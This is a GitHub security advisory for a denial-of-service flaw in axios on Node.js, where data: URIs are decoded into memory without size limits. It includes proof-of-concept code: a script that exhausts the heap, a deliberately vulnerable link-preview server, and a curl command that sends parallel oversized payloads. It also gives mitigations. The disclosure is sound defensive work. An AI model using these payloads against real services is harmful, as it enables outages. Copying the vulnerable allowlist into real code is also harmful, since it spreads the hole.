# GHSA-4hjh-wcwx-xvwj: Vulnerability from GitHub
## Summary

When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform an HTTP request. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.
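Until an upgrade to a fixed release (1.12.0 or later) is possible, callers can refuse `data:` URLs before axios ever dispatches them. The sketch below is a minimal caller-side workaround, not part of axios itself or of this advisory's official remediation; the size cap is an illustrative assumption.

```js
const axios = require('axios');

const client = axios.create();

// Workaround sketch: block (or cap) data: URLs in a request interceptor,
// so the Node adapter never decodes an attacker-sized payload into memory.
client.interceptors.request.use((config) => {
  const url = String(config.url || '');
  if (url.startsWith('data:')) {
    const MAX_DATA_URI_CHARS = 8 * 1024; // illustrative application-chosen cap
    if (url.length > MAX_DATA_URI_CHARS) {
      throw new Error('data: URI exceeds allowed size');
    }
  }
  return config;
});
```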
## Details

The Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.

Relevant code from [`httpAdapter`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):
```js
const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}
```
The decoder is in [`lib/helpers/fromDataURI.js`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):
```js
export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
```
- The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
- It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.
- As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.
By comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and rejects once `totalResponseBytes` exceeds [`maxContentLength`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.
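The decoded size of a Base64 body is a pure function of its character count (about 3 bytes per 4 characters), so a cheap pre-decode estimate is possible even though the adapter never performs one. The helper below is a sketch, not axios code; it also explains the ~120 MB figure used in the PoC that follows.

```js
// Estimate the decoded byte length of a Base64 string without decoding it:
// every 4 Base64 characters yield 3 bytes, minus 1-2 bytes for '=' padding.
function base64DecodedBytes(b64) {
  const padding = b64.endsWith('==') ? 2 : b64.endsWith('=') ? 1 : 0;
  return Math.floor(b64.length / 4) * 3 - padding;
}

// 160_000_000 Base64 characters -> 120_000_000 bytes (~120 MB).
console.log(base64DecodedBytes('A'.repeat(160_000_000)));
```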
## PoC
```js
const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});
```
Run with limited heap to force a crash:

```bash
node --max-old-space-size=100 poc.js
```
Since the Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

```
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
```
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows `data:` URLs, for which axios ignores `maxContentLength` and `maxBodyLength` entirely and decodes the payload into memory on Node before streaming, enabling DoS.
```js
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */
app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
```
Run this app and send 3 POST requests:

```sh
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null
```
## Suggestions

1. **Enforce size limits**
   For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit. A sketch of such a check follows this list.

2. **Stream decoding**
   Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
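A minimal sketch of suggestion 1, assuming the check runs in the `protocol === 'data:'` branch before `fromDataURI()` is called. The function name `assertDataUriWithinLimit` is hypothetical, not an axios API; axios uses `-1` to mean "no limit", which the guard mirrors.

```js
// Hypothetical pre-decode guard: reject oversized data: URIs before any
// Buffer allocation, honouring the caller's maxContentLength.
function assertDataUriWithinLimit(uri, maxContentLength) {
  if (!(maxContentLength >= 0)) return; // -1/undefined => no limit configured
  const comma = uri.indexOf(',');
  const meta = comma === -1 ? uri : uri.slice(0, comma);
  const body = comma === -1 ? '' : uri.slice(comma + 1);
  const isBase64 = /;base64$/i.test(meta);
  // Base64 decodes to ~3/4 of its length; other bodies are at most as long
  // as their URL-encoded text, so length is a safe upper-bound estimate.
  const estimated = isBase64 ? Math.floor(body.length / 4) * 3 : body.length;
  if (estimated > maxContentLength) {
    throw new Error(`data: URI payload (~${estimated} bytes) exceeds maxContentLength`);
  }
}

// Usage sketch (would run before fromDataURI() in the data: branch):
assertDataUriWithinLimit('data:application/octet-stream;base64,QUJD', 1024);
```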
{ "affected": [ { "package": { "ecosystem": "npm", "name": "axios" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.12.0" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2025-58754" ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2025-09-11T21:07:55Z", "nvd_published_at": "2025-09-12T02:15:46Z", "severity": "HIGH" }, "details": "## Summary\n\nWhen Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.\nThis path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`.\n\n## Details\n\nThe Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.\n\nRelevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):\n\n```js\nconst fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);\nconst parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);\nconst protocol = parsed.protocol || supportedProtocols[0];\n\nif (protocol === \u0027data:\u0027) {\n let convertedData;\n if (method !== \u0027GET\u0027) {\n return settle(resolve, reject, { status: 405, ... });\n }\n convertedData = fromDataURI(config.url, responseType === \u0027blob\u0027, {\n Blob: config.env \u0026\u0026 config.env.Blob\n });\n return settle(resolve, reject, { data: convertedData, status: 200, ... });\n}\n```\n\nThe decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):\n\n```js\nexport default function fromDataURI(uri, asBlob, options) {\n ...\n if (protocol === \u0027data\u0027) {\n uri = protocol.length ? uri.slice(protocol.length + 1) : uri;\n const match = DATA_URL_PATTERN.exec(uri);\n ...\n const body = match[3];\n const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 
\u0027base64\u0027 : \u0027utf8\u0027);\n if (asBlob) { return new _Blob([buffer], {type: mime}); }\n return buffer;\n }\n throw new AxiosError(\u0027Unsupported protocol \u0027 + protocol, ...);\n}\n```\n\n* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.\n* It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.\n* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.\n\nIn comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.\n\n\n## PoC\n\n```js\nconst axios = require(\u0027axios\u0027);\n\nasync function main() {\n // this example decodes ~120 MB\n const base64Size = 160_000_000; // 120 MB after decoding\n const base64 = \u0027A\u0027.repeat(base64Size);\n const uri = \u0027data:application/octet-stream;base64,\u0027 + base64;\n\n console.log(\u0027Generating URI with base64 length:\u0027, base64.length);\n const response = await axios.get(uri, {\n responseType: \u0027arraybuffer\u0027\n });\n\n console.log(\u0027Received bytes:\u0027, response.data.length);\n}\n\nmain().catch(err =\u003e {\n console.error(\u0027Error:\u0027, err.message);\n});\n```\n\nRun with limited heap to force a crash:\n\n```bash\nnode --max-old-space-size=100 poc.js\n```\n\nSince Node heap is capped at 100 MB, the process terminates with an out-of-memory error:\n\n```\n\u003c--- Last few GCs ---\u003e\n\u2026\nFATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n1: 0x\u2026 node::Abort() \u2026\n\u2026\n```\n\nMini Real App PoC:\nA small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. 
It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.\n\n```js\nimport express from \"express\";\nimport morgan from \"morgan\";\nimport axios from \"axios\";\nimport http from \"node:http\";\nimport https from \"node:https\";\nimport { PassThrough } from \"node:stream\";\n\nconst keepAlive = true;\nconst httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });\nconst httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });\nconst axiosClient = axios.create({\n timeout: 10000,\n maxRedirects: 5,\n httpAgent, httpsAgent,\n headers: { \"User-Agent\": \"axios-poc-link-preview/0.1 (+node)\" },\n validateStatus: c =\u003e c \u003e= 200 \u0026\u0026 c \u003c 400\n});\n\nconst app = express();\nconst PORT = Number(process.env.PORT || 8081);\nconst BODY_LIMIT = process.env.MAX_CLIENT_BODY || \"50mb\";\n\napp.use(express.json({ limit: BODY_LIMIT }));\napp.use(morgan(\"combined\"));\n\napp.get(\"/healthz\", (req,res)=\u003eres.send(\"ok\"));\n\n/**\n * POST /preview { \"url\": \"\u003chttp|https|data URL\u003e\" }\n * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).\n */\n\napp.post(\"/preview\", async (req, res) =\u003e {\n const url = req.body?.url;\n if (!url) return res.status(400).json({ error: \"missing url\" });\n\n let u;\n try { u = new URL(String(url)); } catch { return res.status(400).json({ error: \"invalid url\" }); }\n\n // Developer allows using data:// in the allowlist\n const allowed = new Set([\"http:\", \"https:\", \"data:\"]);\n if (!allowed.has(u.protocol)) return res.status(400).json({ error: \"unsupported scheme\" });\n\n const controller = new AbortController();\n const onClose = () =\u003e controller.abort();\n res.on(\"close\", onClose);\n\n const before = process.memoryUsage().heapUsed;\n\n try {\n const r = await axiosClient.get(u.toString(), {\n responseType: \"stream\",\n maxContentLength: 8 * 1024, // Axios will ignore this for data:\n maxBodyLength: 8 * 1024, // Axios will ignore this for data:\n signal: controller.signal\n });\n\n // stream only the first 64KB back\n const cap = 64 * 1024;\n let sent = 0;\n const limiter = new PassThrough();\n r.data.on(\"data\", (chunk) =\u003e {\n if (sent + chunk.length \u003e cap) { limiter.end(); r.data.destroy(); }\n else { sent += chunk.length; limiter.write(chunk); }\n });\n r.data.on(\"end\", () =\u003e limiter.end());\n r.data.on(\"error\", (e) =\u003e limiter.destroy(e));\n\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n limiter.pipe(res);\n } catch (err) {\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n res.status(502).json({ error: String(err?.message || err) });\n } finally {\n res.off(\"close\", onClose);\n }\n});\n\napp.listen(PORT, () =\u003e {\n console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);\n console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);\n});\n```\nRun this app and send 3 post requests:\n```sh\nSIZE_MB=35 node -e \u0027const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString(\"base64\"); process.stdout.write(JSON.stringify({url:\"data:application/octet-stream;base64,\"+b}))\u0027 \\\n| tee payload.json \u003e/dev/null\nseq 1 3 | xargs -P3 -I{} curl -sS -X POST \"$URL\" -H \u0027Content-Type: application/json\u0027 
--data-binary @payload.json -o /dev/null```\n```\n\n---\n\n## Suggestions\n\n1. **Enforce size limits**\n For `protocol === \u0027data:\u0027`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.\n\n2. **Stream decoding**\n Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.", "id": "GHSA-4hjh-wcwx-xvwj", "modified": "2025-09-15T14:19:44Z", "published": "2025-09-11T21:07:55Z", "references": [ { "type": "WEB", "url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754" }, { "type": "WEB", "url": "https://github.com/axios/axios/pull/7011" }, { "type": "WEB", "url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593" }, { "type": "PACKAGE", "url": "https://github.com/axios/axios" }, { "type": "WEB", "url": "https://github.com/axios/axios/releases/tag/v1.12.0" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" } ], "summary": "Axios is vulnerable to DoS attack through lack of data size check" }